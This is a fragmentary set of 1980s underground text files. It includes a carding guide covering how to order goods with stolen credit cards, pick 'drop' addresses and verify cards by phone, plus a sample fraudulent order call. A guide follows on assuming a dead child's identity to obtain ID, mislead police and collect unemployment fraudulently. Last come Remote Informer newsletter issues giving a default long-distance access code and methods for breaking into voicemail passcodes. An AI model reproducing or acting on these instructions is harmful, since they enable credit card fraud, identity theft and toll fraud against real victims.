it.  When they ask that just say the biggest bank you know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your area.  Try to avoid American Express.  They tend to lead fu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le investigations.  Unfortunately, American Express is the most popul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 out.   When telling the person who is taking your call the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say it slow, clear, and with confid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g. CC# is 5217-1234-5678-9012.  Pause after each set of four so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have to repea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iration date: The date must be at LEAST in that month.  It is b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with more than three months to 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ddress: More commonly referred to as the 'drop'.  Well the dr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range from an abandoned building to your next door neighb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artment.  If you plan to send it to an apartment building the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e NOT to include an apartment number.  This will confuse UPS or post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n a little and they will leave the package in the lob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is a list of various drops: The house next door whose family i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cation, the apartment that was just moved out of, the old church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e knocked down in six months, your friends house who has absolu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to do with the type of merchandise you will buy and who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not crack under heat from feds,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also services that hold merchandise for you, but person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not trust them.  And forget about P.O. Boxes because you n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to get one and most places don't ship to them any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aspects of carding:Verifying cards, seeing if they were repor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l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ifying cards: Stores need to verify credit cards when someone purch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hing with one.  They call up a service that checks to see i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stomer has the money in the ba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rchant identifies himself with a merchant number.  The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holds the money that the merchant verified on reserve.  Whe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rchant sends in the credit card form, the service sends the merch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ney.  The service holds the money for three days and if no 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ears then it is put back into the bank.  The point is that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t to verify something then you should verify it for a little amou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odds are that there will be more in the ba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ood thing about verification is that if the card doesn't exist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t is stolen then the service will tell you.  To verify Master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Visa try this number.  It is voice:1-800-327-1111 merchant cod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9671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len cards: Mastercard and Visa come out with a small catalog e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ek where they publish EVERY stolen or fraudulantly used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et this every week by trashing the same place on the same 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ever find it trashing then try to get it every wee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ntifying cards: Visa card numbers begin with a 4 and have either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16 digits.  MasterCard card numbers begin with a 5 and have 16 dig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erican Express begins with a 3 and has 15 digits.  They all hav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s of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xxx-xxxxxx-xxxxx   American Exp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xxx-xxx-xxx-xxx    Vi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xxx-xxxx-xxxx-xxxx Vi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xxx-xxxx-xxxx-xxxx Master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ld cards: A gold card simply means that credit is good for $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out a gold card, credit would be normally $2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cognize a gold card on a carbon there are several techniqu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erican Express-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sa-PV instead of C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When verifying a PV Visa, you have to have the real nam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hol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card-An asterix can signify a gold card, but this changes depen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card was issu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going to type out a dialog between a carder and the phon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elp you get the ide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Over-priced Computer Goods, may I help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Hi, I would like to place an order ple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Sure, what would you like to or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400 generic disks and a double density dr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Ok, is there anything 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No thank you, that's all for to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Ok, how would you like to pay for this?  MasterCard or Vi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Vi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And your nam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Lenny Lipshitz." (Name on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And your Visa card number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4240-419-001-340" (Invalid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Expira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06-9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And where would you like the package shipp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6732 Goatsgate Port.  Paris,texas,01016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And what is your home telephon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212-724-9970" (This number is actually always bus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I will also need your business phone number in case we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You can reach me at the same number. 212-724-997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O.K. Thank you very much and have nice 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Excuse me, when will the package arr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In six to seven days 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er:   "Thanks alot, and have a pleasant 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 wait 6-7 days when the package will arrive to the address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really a house up for sale.  There will be a note on the do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Hello UPS, please leave all packages for Lenny Lipshitz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bby or porch.  Thanks alot, Lenny Lipshitz" (Make the signature half-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inc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gnizing credit card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ample: American Exp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XXX XXXXXX X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M/Y1 THRU MM/Y2       Y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hn Doe               A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rst date is the date the person got the card, the sec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e is the expriation date, after the expiration date is the s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its in the first year.The American Express Gold has many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I think 6 8 then 8). If you do find a Gold card keep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it has a $5000.00 backup even when the guy has no mon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ple: Master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XXX XXXX XXXX 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XXX AAA DD-MM-YY MM/Y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hn Do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rmat varies, I have never seen a card that did not start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5XXX there is another 4 digits on the next line that is someti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ked for when ordering stuff, (and rarely a 3 digit letter comb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 ANB). The first date is the date the person got the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second date is the expira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 Card is almost always accepted at sto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ple: VI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XXX XXX(X) XXX(X) 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M/YY    MM/YY*VI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hn Do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sa is the most straight forw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cards,for it has the name right on the card itself, aga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date is the date he got the card and the second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iration date. (Sometimes the first date is left o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can eather be 4 3 3 3 or 4 4 4 4. Visa is also almost alw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pted at stores, therefore, the best of cards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Create A New Indentity                    By The Walking Gl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ight be saying, "Hey Glitch, what do I need a new identity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nswer is simple. You might want to go buy liquor somewhere,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ight want to go give the cops the false name when you get bus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keep your good name, eh?  You might even want to use the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ntity for getting a P.O. Box for carding. Sure! You might e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t the stuff for renting yourself a VCR at some dickless loser o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nience store. Here we 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a new ID isn't always easy, no one said it would be. By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steps, any bozo can become a new bozo in a coupla wee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rst step is to find out who exactly you'll becom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secure way is to use someone's ID who doesn't use it themsel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 who fit that bill the best are dead. As an added bonus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go complaining one bit. Go to the library and l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old death notices. You have to find someone who was born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ame time as you were, or better yet, a year or two ol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buy booze, etc. You should go back as far as you can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th because most states now cross index deaths to births so peo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do this in the future. The cutoff date in Wisconsin is 1979, fol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grand state gotta look in 1978 or earlier. Anything earier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cool. Now, this is the hardest part if you're younger. Brat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ng happen to be quite resilient, takin' falls out of three story wind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eating rat poison like its Easter candy, and not a scratch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t. There ain't many that die, so ya gotta look your ass off. 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n to the library and look up all the death notices you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t's on microfilm so much the better. You might have to go throu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ths of death notices though, but the results are well worth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gotta get someone who died locally in most instances: the dea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ificate is filed only in the county of death. Now you go down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unty courthouse in the county where he died and ge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th certificate, this will cost you around $3-$5 depending on the st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in. Look at this hunk of paper, it could be your wa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nish in a clould of smoke when the right time comes, like right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big scam. If You're lucky, the slobs parents signed him up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cial security when he was a snot nosed brat. That'll be another pie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ID you can get. If not, thats ok too. It'll be listed on the dea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ificate if he has one. If you're lucky, the stiff was bo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lly and you can get his birth certificate right a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check the place of birth on the death certificate, if it'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ame place you standing now you're all set. If not, you can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way for one from that county but its a minor pain and it m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while to get, the librarian at the desk has listings of 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write for this stuff and exactly how much it costs. Get th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rtificate, its worth the extra money to get it certif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ats the only way some people will accept it for ID. When y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 this stuff the little forms ask for the reason you wan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ead of writing in "Fuck you", try putting in the word "Geneolog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get this all the time.  If the Death certificate looks goo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ait a day or so before getting the certified birth certific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case they recognize someone wanting it for a dead gu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 cookin! You got your start and the next part's eas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nk out your old Dot matrix printer and run off some mailing labe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ed to you at some phony address. Take the time to check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y address that there is such a place. Hotels that rent by the mon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large apartment buildings are good, be sure to get the right z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 for the area. These are things that the cops might notic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rip you up.  Grab some old junk mail and paste your new lab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m. Now take them along with the birth certificate down to the libr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a new library card. If they ask you if you had one before say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really aren't sure because your family moved around alot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a kid. Most libraries will allow you to use letters as a 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ID when you get your card. If they want more give them a sob s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how you were mugged and got your wallet stolen with all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ntification. Your card should be waiting for you in about two wee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libraries ask for two forms of ID, one can be your trusty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ificate, and they do allow letters addressed to you as a sec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 got a start, it isn't perfect yet, so let's continue. You sh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two forms of ID now. Throw away the old letters, or better y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uff them inside the wallet you intend to use with this stu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to the county courthouse and show them what nice ID you got and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ate ID card. Now you got a picture ID. This will take about two wee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ost about $5, its well worth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death certificate had a social security number on it you can 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and buy one of those metal SS# cards that they s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t didn't, then you got all kinds of pretty ID that shows exac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 you are. If you don't yet have an SS#, Go down and apply for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are free but they could take five or six weeks to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reaucrats you know... You can invent a SS# too if ya like, but the mot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WALKING GLITCH' has always been "Why not excell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to go whole hog you can now get a bank account in you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me.  If you plan to do alot of traveling then you can put al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money in the account and then say you lost the account book.  Af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get the new book you take out all the cash. They'll hit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 slight charge and maybe tie-up your money some, but if yo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 broke in some small town that bank book will keep you from be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wn in jail as a vagra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D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ddies, you got ID for buying booze, but what else? In some tow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arger the more likely) the cops if they catch you for some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tty like shoplifting stuff under a certain dollar amount, will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you a ticket, same thing for pissing in the street. Thats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fingerprints or nothing, just pay the fine (almost always over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ppear in court.  Of course they run a radio check on your ID, you'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clean and your alter-ego gets a blot on his rec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free and clear.  Thats worth the price of the trouble you've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right there.  If your smart, you'll toss that ID away if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ppens, or better yet, tear off your picture and give the ID to some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like, maybe they'll get busted with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e a working stiff, here's a way to stretch your dollar. Go to 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s long as it takes to get unemployment and then get yourself f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to work under the other name while your getting the unemploy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 couple of sets of ID, you can live like a king.  These concep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survival in the new age come to you compliments of THE WALKING GL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release of this phile 7/7/8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ought to you in the Cookbook courtesy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Remote Infor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Editors: Tracker, Norman Bates, and Ye Cap'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eptember 26, 1987                                           Issue: 0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rought to you by the 'new' TUFF:  The Underground Fone Fede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Ne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print Strikes Back      |    Celestial Elite/TUFF Come to an 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print caught a guy dealing|   Celestial  Elite  and  TUFF, the  fam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s  on  the  street  in  LA|hack/phreak groups came to an end  a cou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past  week.  Information|weeks ago.  TUFF, however, is being  rebo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bust  is limited  at|and you can  expect it to  be back  to fu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ime.                    |force within a month.  Sources have it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seventeen  year  old  was|Magnus Adept, head  of the  now  termin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ted  in Arizona  last week.|group, Celestial  Elite, has  started a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ame of the  teenager will|group called Avalon Kingdom.  We are uns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be printed to  protect him|what plans are in store for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harassment calls.        |   TUFF has  several ideas  and  plan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ll be out to the  public soon.  Look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This information was supplied|future  issues  of The Remote Informer (t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y Phreaky Phone II      |for new upd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eige Box Bust        |   TeleNet Hacker   |  Bate's Motel Mo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e  of our  editors and  a|   Crusader released|   Bate's  Motel  B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mber of  TUFF, Norman  Bates|his  TeleNet hacking|run  by  Norman B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caught  for  Beige boxing|program on September|was forced to mov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he had done over 3 months|20, 1987.  Look  for|is temporarily  set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o.  The  calls  he had  made|it on a  good  board|at  (619)267-8619.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inside his state and cost|you  call.  A review|will remain 1200 bau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otal  of $12.  He  paid the|will be in the  next|and a  member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ll and no charges were filed|issue of The Remote |TUFF  Network.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ainst him.                  |Informer.           |open to the pub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hreaky Phones Return: Amazing?   | LDDS Buys Out TMC: Companies Mer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original Phreaky Phone numbers|   LDDS bought  out TMC last  mon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support  the new  Phreaky Phones.|They merged into  LDDS, since it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ys running  them  had protested|bigger  and   more  widespread.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  lines were being monitored.|companies that  were  subscribing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no way that could have been,|the  TMC  long distance service w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y contradicted  themselves by|automatically coverted to LDDS.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tarting Phreaky Phones on the same|local TMC ports still work, but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They  gave  alot of  credit|soon be disconnected.  Refer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people calling to suggest they|article  on  LDDS  in this issue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 a story like that.           |more  information on LDDS  dial-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US Sprint Calls Destinations  |  Pirate's Hollow Is Back With 10 Me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 Sprint  now  calls  all the|   Pirate's Hollow is  back on-lin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called  with unauthorized|now is run a  10 meg hard drive.  Un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s.   Their  dis-advantage  is|most boards that have #'s  of megs,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y are  delayed by  about|one will stress more  attention  on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months  in  calling  because|database.  The  database is schedul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have to  wait  till  people|be online by October 1st. This datab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ort they did not make calls to|will  contain 800+ text files on vari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umbers they were billed for.|topics, with  about 60% - 70% pertai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st advice is  to not call voice|to  illegal  activities.  Unfortuna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Sprint  except to  those who|Trax Xe is being redesigned, so until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private  lines  other than|is finished, it will run on Carina.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r regular phone line.        |number is (415)593-6784 (300/1200 bau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aggers and Bragg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ction is to make  you aware  of well-known raggers and bragg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this is  the first time this  section is being printed, we will t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hat classifies people as raggers and braggers.  In  the future issu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op raggers and braggers will be  listed in this newsletter to le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Ops  know who not to let on their board, or to  atleast keep an eye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ragger is someone who will put someone else  down for someth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son might post a message  asking a novice  question  about hacking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ing, or may  say  something  that is completely wrong, and a  rag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put the  other person  down for he said, posted, etc.  The one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ually classify in this category are the ones that think they know it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onsider themselves right  no matter  what anyone  says.  Mos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that  use codes and  consider  themselves a  master phreaker usu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ome ragg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bragger is someone who either does or thinks he does know ever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s it upon himself to tell  the  whole  world that he  knows it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person is also  one who thinks he is better  than  everyone els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believes he is Elite, and no one else is.  People  who tend to  do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those who have, for some reason, become well-known in the  under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s  a result become a bragger.  Those  usually not too well-known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tend  to brag as  much as  those who think  everyone would  love t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ir friend and be like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 a well-known ragger and  bragger, The Toad, learned that it doe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p to be one or both of those.  He  has since  changed and is now eas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pted by  most.  Most people  disliked him because others they knew h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id something bad about him.  This  is called peer pressure and  is a b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 to those who  are new to the underworld.  I would suggest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ture,  to not judge someone by what others  say, but rather by  how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ct around/to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current  most  popular Atarian  that  classifies as a  ragger an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agger is Ace of Aces, and  is well-hated by many users and SysOps, si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ends to put  down anything anyone  says and considers himself the b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writing hacking programs.  He is commonly  referred to as  Ass of A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ss of Assholes.  Even holding an open  mind about this guy, you w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n come to find that what others said  coincides  with what you see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New 950 has arri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DDS, who as  mentioned above bought out TMC, is  installing  a new 95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 to most major  cities.  By the time  you read  this, it should  b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most every area that supports 950 ports.  The number is  950-1450.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 will dial 976 numbers, but not 700, 800, or 900 numbers.  The dia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for LDDS is:  7 digit code, then  even if the code is  bad it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you a dial tone.  Then  dial the area  code  plus the number.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a bad code it will simply say your call cannot be completed as it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ed.  There is a default code used on the system that  currently wo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de is simply, 1234567.  I have seen codes from 5 different compan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y all are in the format of 00xxxxx.  I do  not  know  what  typ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ftware they use, but I  will  know by  the next  issue exactly what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ce  on  the bills.  This  could  be  the  answer  to  alot  of peop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blems with fear of Sprint and ITT, especially  AllNets.  Just reme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ker  is the one  who  found  this, and all  information  about it.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one  is seen saying  they found  this, then they will be listed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xt issue which will contain an article on leech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ilbox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ilbox systems are the link between information and the underworld.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ave ever called one, then you will know the advantages of having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pecially the ones that are  open to whole underworld, rather than jus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 few.  There are two types  of mailbox systems that are widely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first  type we will  talk about is the multiple mailbox systems,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only referred to  as  message  systems.  These  systems  have sev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boxes set up on one number.  Usually, you  can access other  mailbo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at  number  by  pressing '*' or '#'.  Sometimes you  just ent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box number and you are connected.  These are the safest systems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protect information from US Sprint and other  long distance  compan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US Sprint and other companies  call  the destination  numbers,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fer to  have 800 mailbox systems, and  most  of  the time, the  multi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box systems  are on 800 numbers.  The  passcode on  these  systems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y in length and can be accessed by several  different methods, so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ssible to explain exactly how to hack these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other type is the single mailbox system.  These  are usually set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reserved  prefix in an area  code.  (Ex: 713-684-6xxx)  These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usually  controlled by the  same type of hardware/software.  To a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rea  where you  enter the  passcode, just hit '0' for a second or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asscodes are  four (4)  digits  long.  The only way to hack  thes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ually.  The best thing you could do is to  find one that does not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recording from a person, but just the  digitized voice.  If you hack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omeone already  owns, they will  report it and  it will not last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re is a list mailboxes or prefixes to help you get star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ingle                          Multiple                        Dig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3-281-8xxx                     212-714-2770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3-285-8xxx                     216-586-5000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3-515-2xxx                     415-338-7000 Aspen Message System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4-733-5xxx                     714-474-2033 Western Digit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4-855-6xxx                     800-222-0651 Vincent and Elkins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4-978-2xxx                     800-233-8488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5-949-2xxx                     800-447-8477 Fairylink               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12-450-8xxx                     800-521-5344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13-768-1xxx                     800-524-2133 RCA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05-557-8xxx                     800-527-0027 TTE TeleMessager        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02-230-4xxx                     800-632-7777 Asynk                   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19-492-8xxx                     800-645-7778 SoftCell Computers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13-684-6xxx                     800-648-9675 Zoykon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800-847-0003 Communications World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Disclai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 the editors, take no  responsibility  for  your actions and  us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formation in this newsletter.  This newsletter is for  informa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rposes  only.  If  you   are  easily   offended   by   telecommun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ussions, then we suggest  that you not read  this newsletter.  But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se  who are  truely interested in the  information in this  newsl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joy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ming in the next iss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the next issue, we  will  be open  for suggestions from  the read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is issue.  We will have some featured articles though, which inclu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Study of brid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Review of Crusader's new TeleNet Hac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More information on the new LDDS 950 p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Review of Code Hackers for all mod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List of TeleNet addre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Credit Card check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Ideas from the read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ought to you in the Cookbook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Remote Informer Newsl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ovember                                                     TRI Issue: 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Editors:  Tracker, Ye Cap'n, Norman Bates, and The Repor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t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been a month now, and ALOT has happened.  So much, in fact, t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will be split into several issues.  This should be no shock si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ntioned in the first issue that we may put several issues out someti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want to congratulate the readers for finally contributing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sletter.  This first two issues were all on information that I, my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btained.  Several people gave me information for these issues, and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le and information is included in the artic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 The Ne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T has 9 digits!     |       Phreaky Phones Go Down!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 those of you who did|   The famed Phreaky Phones  are down|   We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know this, ITT has nine|again. Modem Man, the original person|so much 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it codes.  They are said|that started them, has said that they|to put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ive  better connections|will be down until further notice. In|that  we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ome extent.  This info.|the meantime, other independent boxes|putting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originally given to us|are being started.   A listing can be|many  issu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Party Beast.            |made of current ones on request.     |at one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gnus Adept Gets Busted  |    Sprint Codes Are Dying Fast!    |all   issu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are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ellow Atarian  and well-|   Sprint codes  are hard to get and|now,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n  phreak  Magnus  Adept|when they are obtained, they tend to|call  on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caught  by MCI.  Details|die rather  quickly.  Phreakers have|the   boa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how, when, and where|been  saying that  the 950-0777 port|at  the  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not known at  this time.|is dead, but  on the contrary, it is|of the iss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caught with 150 codes|still  available in states  that are|or look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ay  have to pay  up to|not highly  abused by phreaks.  Here|an editor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 dollars  for  each  code.|again, rumors are being spread.     |a hack  B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Best BBS of the Mon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rting from now on, we will have a BBS of the month.  We will choos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S, ragardless of computer type, and look at the user participation in phr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ted matters, as well as quality discussions on the various illegal topi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BBS can remain the BBS of the month as long as they reside above the res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BS systems.  Even though we will sometimes bring out more than one iss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month, the board will remain BBS of the month until the first issue in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 month comes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month's BBS of the month is FBI PirateNet.  We chose this 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of the large numbers of posts in the bases, and not only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discussions as well, with a minimum number of posts from ragger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aggers.  The number for it is 516-661-7360.  The SysOp of FBI PirateNe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antom, not to be confused with an earlier nar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S Sprint Expected to Trim Staff, Consolidate Divis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w York -- US Sprint Communications Corp., the troubled long di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ier, is expected to announce soon that it will cut its work force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ral hundred people and reduce its seven regional divisions to 3 opera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ps, sources familiar with the company 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company's Pacific division is based in Burlingame, CA.  The layoff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reorganization are part of a plan by US Sprint's new president, Robert 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nedaker, to reduce heavy operating losses, which analysts expect to rea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than $800 million this y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nedaker replaced Charles M. Slibo, who was forced to resign in Ju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losses were running much higher than the parent companies h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ected.  Problems with the company's computerized billing system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ibuted to Skibo's ouster.  US Sprint is owned and operated by the G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p. and United Tele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ording to sources close to Snedaker, who was vice chairman and chi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ing officer of United TeleCom, he is planning to consolidat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s 7 divisions, which operate in the same geographical regions a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n regional Bell operating companies, into 3 divi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rationale for the move, according to idustry analysts, is t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will need a much smaller work force once it begins handling all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traffic on it's new fiber optic network, which can carry a gre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of telephone calls at less cost.  Company officials have said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expect to have most of the traffic on the network by early next y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e source said that there would be more than one round of layoffs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months and that the company ultimately plans to reduce its 14,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mber work force by 15 perc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veral top managers are expected to resign as soon as US S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ralizes its marketing and support operations as its headquarters in Kans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ty, MO., according to a report in the latest issue of Business Wee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az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spokesman for US Sprint said on Friday that the company would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ent on the rumors.  The company is the nation's third largest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tance company, after the American Telephone and Telegraph Co. (AT&amp;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CI Communications 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st year, Washington based MCI undertook a similar reorganization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it posted a $502.5 million loss to write down old inventory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tructure oper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alysts said that is US Sprint is to turn a profit, the company m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rease its market share.  "To do this, US Sprint must gain more l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iness customers, which account for about 80 percent of industry revenu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id Robert B. Morris III, Securities in San Francis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rris said that by using a slick marketing campaign to differentiate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fiber telephone network from those of competitors, US Sprint more t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ubled its customer base last year.  But "most of these customers w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dential and small business users that added little to Sprint's bott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he added.  "If the company expects to be profitable, it will hav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entrate on providing the best service to volume u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is information was supplied by Ye Cap'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ecret Service Cracks Down on Teen Hack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unt Lebanon, PA -- The US Secret Service and local police depart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put a scare into the hacker community with a nationwide crackdown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crime that has resulted in the arrests of teenage hackers in at le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ee c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ople who monitor the bulletin boards say there are a lot of nerv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ers out there, wondering who will be arrested next," says Ronald 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edman, vice-president of Advanced Information Management, a Woodbridge, V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e computer security fi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ine teenagers from Mount Lebanon Junior-Senior High School n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ttsburg, PA, were arrested recently and charged with computer frau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veniles allegedly used home computers to gain illegal access to a cred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 authorization center.  They obtained valid credit card numbers and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 to purchase thousands of dollars worth of mail order merchandi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ice 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eedman says it appears the hackers used some relatively sophistic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ques in the scheme, including specially written software that enab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 to bypass security controls and navigate through credit records to ob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lice officials say that the hackers also obtained access codes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rate bulletin board systems to make free long distance calls and gain a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various business and government compu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arrests were the result of a 6 week investigation by the Secr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and the Mount Lebanon police. The police were tipped off by par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 were suspicious about how their son managed to obtain a skateboard valu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1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Secret Service was also involved in investigations that led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rests of several hackers in San Francisco and New York last Ju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cret Service spokesman William Corbett says that although some repo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portrayed the hackers as part of a national crime ring, the cas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related.  "It's just that a few of these computers hacking cases came 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 at about the same time," he s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ederal Legislation enacted in 1984 gives the Secret Service, par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artment of the Treasury, a major role in investigating computer cri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 the federal Computer Fraud and Abuse Act of 1986, computer fraud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lony that carries a maximum penalty of 5 years for the first offense, and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rs for the second.  Displaying unauthorized passwords on hacking bullet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ards carries a maximum penalty of 1 year in prison for the first off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10 years for the sec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is information was supplied by Ye Cap'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erman Teens Crack NAS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ashington, D.C. -- A group of West German teenagers from the Chao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Club penetrated a NASA network recently, saying they were doing i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 th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at they got into was SPAN Net, a computer network with about 700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is actually based at the Goddard Space Center in Maryland.  All tha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re is unclassified data, space science information, and post-flight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ysis.  "Anyone with NASA related research can apply for access to SP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a spokesman, who adds that the network runs on DEC VAX hardware.  "W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cked up three attempts to gain access and put in security precautions so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t happen."  His personal opinion is, "We're happy that they couldn't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 in, and decided to go public."  He also added that NASA has many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s, many of the classified and "probably inpenetrable.  But I do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t to challenge anybo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d they get in?  Probably they got a West German NASA licensee,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ve them a visitor's pass, then they created new passwords with unlimi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urity for themselves, after which getting around the network was eas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upplied by Ye Cap'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 look for information in anyway related to the newsletter.  If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hing of interests, or something that you saw on television, or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spaper, then upload it to one of the boards listed below.  You will rece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 cred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rate's Hollow..................................................(415)593-678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te's Motel.....................................................(619)267-029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Remote Informer Newsl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ovember                                                     TRI Issue: 0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Editors: Tracker, Ye Cap'n, Norman Bates and The Repor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FCC Charges Much Ado About Not M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w Cannan, CT -- International Resource Develope of New Cannan, CT s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 market bubble for packet switch networks like TeleNet is going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rst by 1991, regardless of what the Federal Communications Commission d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access charges.  Cheap fiber, which greatly increases the capacity,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DN services, which let you share a phone line with your computer, will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usiness in, the report says.  Over the next four years, howev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mand for packet switch services to will grow from $650 million to $1,6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llion (If the Baby Bells are allowed to add competition to the marke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hour access charge cannot be passed though to the customers any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upplied by Ye Cap'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irate's Hollow Up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an Carlos, CA -- The Pirate's Hollow, one of the more popular BBS'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ay Area, is installing several new features that will even add to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pularity.  For one, users will be able to gamble against each other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ting on NFL games and participating in the Pirate's Hollow Lottery.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rder to support one of the best newsletters around, the Pirate's Ho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soon be adding a seperate module that will act as an outpost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Informer.  This module will feature the older issues of the newsl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ection that will keep you abreast of updates of recently relea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and a section that will show what is upcoming in the next issu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Remote Infor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long-awaited database will soon be put online.  Over 800 text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variety of subjects will be available to the users that pay the a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 that will be determined at a later date.  Many more are on the way,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e included at no charge. The charge will be a one time charge thou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her than a yearly pay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other new option will be available by early December.  PC Pursu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back will be installed.  This will allow people to call and then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ed back if your area code is supported by PC Pursuit.  This will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ire a charge, to be set at a later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irate's Hollow has been doing well in its comeback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mmunications world, but we need more callers in order to formulat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diverse user base.  Please spread the BBS # around while also trying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others aware of the newsl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witching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re are currently three different forms of switching systems that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ent in the United States today. Step by Step (SxS), Crossbar, a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 Switching System (ESS) make up the group.  Phreaks have always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ittle tenative when it comes to "doing their work" once they have he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effects of switching systems on their hobby.  After researching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ic, I have found that there really is not that much to be worried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 on, while I share with you information which I have compiled about all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switching systems and their distinct feat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first switching system that was used in the country was called Ste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Step.  This was adopted in 1918 by Bell, and until 1978, they had over 5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ll their exchanges using Step by Step (SxS).  This system is known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long, confusing train of switches that are used for its step by ste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ep by Step has many disadvantages to phone users.  The switch tr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omes jammed fairly often, and it causes calls to be blocked.  Also, Sx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es not allow the use of DTMF dialing. This accounts for some of the area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nited States that cannot have touch tone dialing abilities.  A tremend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ount of electricity and maintenance needs to accompany the SxS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which makes it even more impratical.  All in all, this is probabl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archaic switching system a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re are a number of ways to see if you are on SxS.  You will notic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no pulsing digits after dialing.  Most sources say that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will sound like many typewriters.  SxS does not offer features such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ed calling, call forwarding, three-way calling, call waiting, and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h services.  Pay phones on SxS also will want your money before you rece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dial tone.  This adds to the list of disadvantages labelled to tha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by Step switching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other type of switching system that is prevalent in the United St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Crossbar.  Crossbar has been Bell's primary switcher after 1960, and th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s of it exists.  Number 1 Crossbar (1xB), Number 4 Crossbar (4xB), a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5 Crossbar (5xB).  In Crossbar, a switching matrix is used for a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s in an area, and when someone calls, the route is determined and is m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with the other phone.  This matrix is set-up in horizontal and verti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ths.  Unlike other swichting systems, in my research, I could not come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ny true and definate distinguishing features of the Crossbar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Electronic Switching System (ESS) is yet another switching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in the United States and the most used of all three swicthing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S is an extremely advanced and multi-faced type of switching system, and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ared by marauders of the phone company everywhere.  With ESS, your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is able to know every digit dialed (including mistakes), who you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called, and how long you were connected.  ESS is also programm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nt out the numbers of people who make excessive calls to WATS numbers (8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s) or directory assistance.  This feature of ESS is called 8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eptional Calling Report, and has spelled the end of some form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inuous code hacks to certain extenders.  ESS can also be programm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nt logs of who called and abused certain numbers as well.  Everything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pt track of in its reco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aforementioned facts show that ESS has made the jobs of organiz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h as the FBI, NSA, and other phone company security forces easier.  Trac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be done in a matter of microseconds, and the result will be convenien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nted out on the monitor of a phone company officer.  ESS is also programm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pick up any "foreign tones" on the phone line such as the many varied t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ulated by bo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SS can be identified by a few features common in it.  The 911 emerg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is covered in the later versions of ESS.  Also, you are given the d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ne first when using a pay phone unlike that of SxS.  Calling services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forwarding, speed calling, and call waiting are also common to ESS.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feature common to ESS is ANI (Automatic Number Identification) for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tance calls.  As you can see, ESS is basically the zenith of all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and it will probably plague the entire country by the early 1990'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n after, we should be looking forward to a system called CLASS.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system will contain the feature of having the number of the per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s calling you printed out on your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at have I concluded about these switching systems?  Well, they are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od enough.  I know a few people employed by the phone company, and I k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fact that they do not have enough time these days to worry about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especially in large, metropolitan areas.  So, I will go out on a li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nd say that a large portion of people will never have to worry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rrors of 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ritten by Ye Cap'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ew Gizmo Can Change Voice Ge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most amazing device has turned up in the new Hammacher Schlem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talog:  the telephone voice gender chan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at it does is change the pitch of your voice from, say, soprano to b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 most efficient way to dissuade an obscene phone caller just as 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warmed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at is not the same as running a 45 r.p.m. record at 33. In digit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rsion, the pitch can be changed without altering the sp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device runs on a 9-volt batter and attaches to the telephone mou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ce with a rubber coupler that takes but a moment to slip on and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the changer switched on, says Lloyd Gray, a Hammacher Schlem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cal expert, "the effect is similar to what you hear when they intervi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anonymous woman on television and disguise her voice by deepening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better for changing a woman's voice to a man's than the other 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Gray said.  A man can use it to raise the pitch of his voice, but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ll won't sound like a w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man could, however, use the changer to disguise his voice. But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vice set on high, Gray's voice still could be identified as his own. On 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normal tenor became so gravel like that the words were unintelligi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upplied by Tracker and The Repor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 look for information in anyway related to the newsletter.  If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hing of interests, or something that you saw on television, or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spaper, then upload it to one of the boards listed below.  You will rece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 cred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rate's Hollow..................................................(415)593-678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tes Motel......................................................(619)267-029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ought to you by the Jolly Roger in the Cookboo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Remote Informer Newsl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ovember                                                     TRI Issue: 0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Editors:  Tracker, Ye Cap'n, Norman Bates, and The Repor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T&amp;T R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ASHINGTON -- American Telephone &amp; Telegraph Co. proposed Tuesda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er its interstate long-distance rates by an average of 3.6 percen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lect reduced costs in connecting to the local telephone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largest decrease -- 6.3 percent -- would be seen in day time pr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of the need to make those rates more competitive," AT&amp;T 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ates for calls made during evening hours would drop 2.2 percen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s made during the late night and weekends would be cut by 0.8 percen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rate reductions would take effect Jan. 1, if they are approved b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deral Communications Commis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acting to the proposed price cuts, MCI Communications Corp. and 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t Communications Co., the nation's second-largest and third-largest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tance companies respectively, said their response would depend on w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CC finally approves but both said they intended to remain competitive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amp;T. AT&amp;T, the nation's largest long-distance company, proposed to the FC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ts rates drop as much as $800 million, but AT&amp;T said the exact amou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depend on the access charges the FCC allows the local telephone compan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ollect from long distance carriers, which must pay the fees to hook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one local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T&amp;T has challenged the new access rates filed by the regional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ing companies, contending they are more than $1 billion too hi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proposing its new rates, the long-distance leader told the FCC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ects local companies' access fees to fall by at least $200 million --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amount to an average rate reduction of less than 1 percent.  B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said it believes the FCC will order an additional $600 million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uctions based on AT&amp;T's challe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re confident the FCC will recognize that access charges filed b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l telephone companies need to be substantially reduced, which would me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savings for our customers," said Larry Garfinkel, AT&amp;T vice president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e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 said the company filed its proposed rates based on disputed char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we wanted to let the public react ... and further to let the FCC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 knowledge of where we were heading given our expectation that we ha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lid basis for our disp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T&amp;T's long-distance rates have fallen by about 34 percent sinc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was stripped of its local operating companies by an antitrust dec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arly four years a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nce then, phone rate payers have been paying a larger share of the co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aintaining the local network through monthly subscriber line charges,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0 for residential custom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at has reduced the long-distance companies' share of local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enses, which they pay in the form of access char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ck Grubman, a telephone analyst with PaineWebber Inc., said AT&amp;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posal targets business customers because "that's where the competition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here the better (profit) margins are." In addition, it aims to keep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sure on competition in international calling by extending discount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customers. Grubman added that, if the company's rate proposal is appro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CC, he would expect no further cuts in AT&amp;T rates in 198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ndell Lind, AT&amp;T administrator of rates and tariffs, said the cut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iness and residential customers are about the same because business cu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offset by a proposed $128 million increase in AT&amp;T's private line r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T&amp;T is the only long-distance company whose rates are regulated b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CC, but its prices set the pace for the industry. Though AT&amp;T is far lar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 any of its competitors, its market share has been declining si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estiture and the company now says it serves about 75 percent of the mark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addition to the reductions in basic long-distance rates, AT&amp;T propo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tting prices by 5 percent and 5.7 percent for its Pro-America calling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company also proposed to reduce prices by 2.9 percent for its 8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customers and 4.4 percent for WATS customers, although it w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rease the monthly access line charges for those plans by $3.20 to refl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er special access charges filed by the local phone compan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upplied by Tracker and The Repor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S Sprint Operator Service Traffic Increases 4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ew Center Added In Dall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LANDO, Fla. -- US Sprint Wednesday announced its long di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s who began saying, "May I help you?" just five months ago, are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ling 3.5 million calls a mon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fiber-optic long-distance carrier, offering the only operator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ernative to AT&amp;T has experienced a 40 percent growth in operator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s since it announced its service July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anda Weathersby, US Sprint vice president of product marketing, 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esday, "More and more people are taking advantage of our call comple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istance and alternative billing arrange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ustomer surcharges are the same as AT&amp;T with the added benefit of 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t's fiber-optic quality and lower long-distance r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 Sprint currently offers person-to-person, station-to-station,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letion and collect calling. US Sprint has announced an agreement with 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ST Service Link that will allow anyone to call on US Sprint and ch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r calls to a Regional Bell Operating Co. calling card beginning in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rter 198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eviously, our operator service was available only on pre-subscrib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 Sprint phones and recently we added operator assistance for US Sprint F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 customers," Weathersby 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this new agreement, we'll be able to expand our operator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arkets such as pay 